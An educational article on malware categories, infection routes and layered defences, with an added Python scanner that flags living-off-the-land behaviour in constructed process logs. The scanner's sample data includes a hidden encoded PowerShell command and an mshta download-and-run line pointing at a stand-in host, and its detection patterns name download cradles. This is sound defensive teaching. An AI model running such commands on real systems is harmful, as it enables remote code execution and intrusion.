Malware types
Viruses, worms, trojans, ransomware, rootkits and the rest: classified by how they spread and what they do.
Two questions to classify any malware
Malware (malicious software) is any program written to harm, exploit or gain unauthorised access. The zoo of names becomes manageable if you ask two questions of each sample: how does it spread? and what does it do? Many real samples are blends (a "worm that drops ransomware"), so the categories describe behaviours, not rigid boxes.
Classified by how it spreads
A virus attaches itself to a legitimate file or program and requires a user to run the host file to execute and spread. Like a biological virus, it needs a host and an action to propagate (opening the infected document, running the program).
A worm is self-propagating: it spreads across networks with no user interaction, by exploiting vulnerabilities. This autonomy is why worms cause explosive, large-scale outbreaks: WannaCry (2017) wormed through an SMB vulnerability using the EternalBlue exploit and hit hundreds of thousands of machines in days. The distinction "virus needs a user, worm doesn't" is a guaranteed exam question.
A trojan disguises itself as something legitimate and desirable (a cracked game, a fake update, an email attachment) to trick the user into running it. It doesn't self-replicate; it relies on deception, and is often the initial foothold that delivers other malware.
Classified by what it does
Ransomware encrypts the victim's files and demands payment for the key. It is now usually double extortion: data is stolen first, then encrypted, so victims who restore from backup are still threatened with publication (which defeats "we have backups" as a complete answer). It is the dominant criminal threat to organisations and is frequently sold as ransomware-as-a-service.
Spyware covertly gathers information: browsing, files, credentials. Keyloggers are a focused form, recording keystrokes to capture passwords. Infostealers are a booming category: they grab saved passwords, cookies and crypto wallets, which are then sold on.
Adware bombards the user with ads and is often bundled with legitimate software, sometimes acting as a spyware vector. More nuisance than catastrophe, but a sign of poor hygiene.
A rootkit hides the attacker's presence by subverting the operating system itself, intercepting system calls so infected files and processes don't appear in normal listings. Kernel- or firmware-level rootkits are extremely hard to detect and remove, sometimes surviving an OS reinstall. The defensive answer is often to rebuild from known-good media and verify boot integrity (Secure Boot, TPM).
A bootkit is a rootkit that infects the boot process, loading before the OS and its defences.
A backdoor provides a hidden method of bypassing normal authentication to regain access later. Often installed after initial compromise to ensure persistence.
Bot / botnet malware enrols the machine into a network of compromised devices (bots or zombies) under a central command-and-control (C2) server. Botnets power DDoS, spam and credential stuffing, and are rented out to other criminals.
A logic bomb is dormant code that triggers on a condition (a date, a user being removed from payroll). Associated with malicious insiders.
Fileless malware runs in memory using legitimate system tools (PowerShell, WMI) rather than writing a malicious file to disk, a technique called living off the land. It evades file-scanning antivirus, which is part of why detection has shifted toward behaviour rather than signatures.
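To show what "behaviour rather than signatures" looks like in practice, here is an added example that is not part of the original article: a small Python scanner that applies living-off-the-land heuristics to process-creation records. Everything in it is constructed for the example: the record format ("timestamp|parent image|image|command line"), the sample log lines, the file paths and the rule names. The field names echo the shape of Sysmon process-creation events, but no real log format is parsed, and the rules are illustrative heuristics, not a vendor's detection content.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events: "timestamp|ParentImage|Image|CommandLine".
# Every value below is invented for this example; the base64 blob is meaningless filler.
SAMPLE_LOG = r"""
2024-05-01T10:00:01Z|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -Command Get-Process
2024-05-01T10:02:13Z|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==
2024-05-01T10:02:15Z|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd.exe /c mshta.exe http://example.invalid/stage.hta
2024-05-01T10:05:40Z|C:\Windows\System32\svchost.exe|C:\Windows\System32\cscript.exe|cscript.exe //nologo C:\scripts\inventory.vbs
"""


@dataclass
class ProcEvent:
    ts: str
    parent: str   # full path of the parent process
    image: str    # full path of the new process
    cmdline: str  # command line of the new process


def parse_events(text):
    """Parse the constructed pipe-separated format into ProcEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(ts, parent, image, cmdline))
    return events


def basename(path):
    """Lower-cased file name, tolerant of both path separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Legitimate tools that fileless malware commonly lives off (hypothetical rule set).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "wmic.exe"}
# "-e", "-enc" or "-EncodedCommand" followed by a long base64 run.
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}")
# A script host reaching out to fetch content (a download cradle).
DOWNLOAD_CRADLE = re.compile(r"(?i)https?://|downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b")


def rule_office_spawns_script_host(ev):
    # Documents should not normally start shells or script interpreters.
    if basename(ev.parent) in OFFICE_APPS and basename(ev.image) in SCRIPT_HOSTS:
        return "office-app-spawned-script-host"


def rule_encoded_powershell(ev):
    if basename(ev.image) in {"powershell.exe", "pwsh.exe"} and ENCODED_CMD.search(ev.cmdline):
        return "powershell-encoded-command"


def rule_download_cradle(ev):
    if basename(ev.image) in SCRIPT_HOSTS and DOWNLOAD_CRADLE.search(ev.cmdline):
        return "script-host-download-cradle"


def rule_wmi_spawns_script_host(ev):
    # WMI provider host launching a shell is a classic living-off-the-land chain.
    if basename(ev.parent) == "wmiprvse.exe" and basename(ev.image) in SCRIPT_HOSTS:
        return "wmi-spawned-script-host"


RULES = [rule_office_spawns_script_host, rule_encoded_powershell,
         rule_download_cradle, rule_wmi_spawns_script_host]


def evaluate(ev):
    """Labels of every rule that fires on one event (empty list if benign)."""
    return [label for label in (rule(ev) for rule in RULES) if label]


def scan(text):
    """Return (timestamp, [labels]) for each event that matched at least one rule."""
    hits = []
    for ev in parse_events(text):
        labels = evaluate(ev)
        if labels:
            hits.append((ev.ts, labels))
    return hits


if __name__ == "__main__":
    for ts, labels in scan(SAMPLE_LOG):
        print(ts, ", ".join(labels))
```

Note that none of the four rules looks at a file hash: the benign PowerShell run from Explorer and the benign cscript inventory job pass untouched, while the two suspicious events are flagged purely on parent/child relationship and command-line shape, which is exactly the kind of signal that still exists when nothing malicious is written to disk.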
RATs and stagers
A RAT (Remote Access Trojan) gives the attacker interactive remote control (files, webcam, keystrokes, command execution). Modern malware is frequently multi-stage: a small dropper/loader gets in first, then pulls down the heavier payload from a C2 server, which makes the initial artefact small and the final payload easy to swap.
How malware gets in
- Phishing email: by far the most common delivery (attachment or link). Social engineering, next chapter.
- Drive-by download: a compromised or malicious website exploiting the browser.
- Removable media: USB drives (how Stuxnet crossed air gaps).
- Software supply chain: trojanised legitimate software or a poisoned dependency/update (OWASP A03).
- Exploiting exposed services: worms and automated attacks against unpatched internet-facing systems.
- Malvertising: malware delivered through ad networks.
Defence in summary
No single control stops everything, so layer them: keep systems patched (closes the holes worms and exploits use), run EDR/antivirus that detects by behaviour not just signatures, enforce least privilege (limits what malware can do once running), filter email and web, take offline/immutable backups (the real answer to ransomware availability loss), train users against phishing, and segment networks to stop a worm or ransomware spreading. Application allowlisting and disabling macros remove common execution paths entirely.
Quick recall
- Spread: virus (needs a user to run a host file), worm (self-propagates over the network, no user), trojan (disguised, relies on deception).
- Payload: ransomware (encrypt + now double-extort), spyware/keylogger/infostealer (steal info), rootkit/bootkit (hide presence, OS/boot-level), backdoor (persistent re-entry), bot (joins a botnet), logic bomb (condition-triggered), fileless (in-memory, living off the land).
- RATs give remote control; modern malware is multi-stage (dropper → payload from C2).
- Entry: phishing (most common), drive-by, USB, supply chain, exposed unpatched services.
- Defence is layered: patch, behaviour-based EDR, least privilege, offline backups, email/web filtering, user training, segmentation.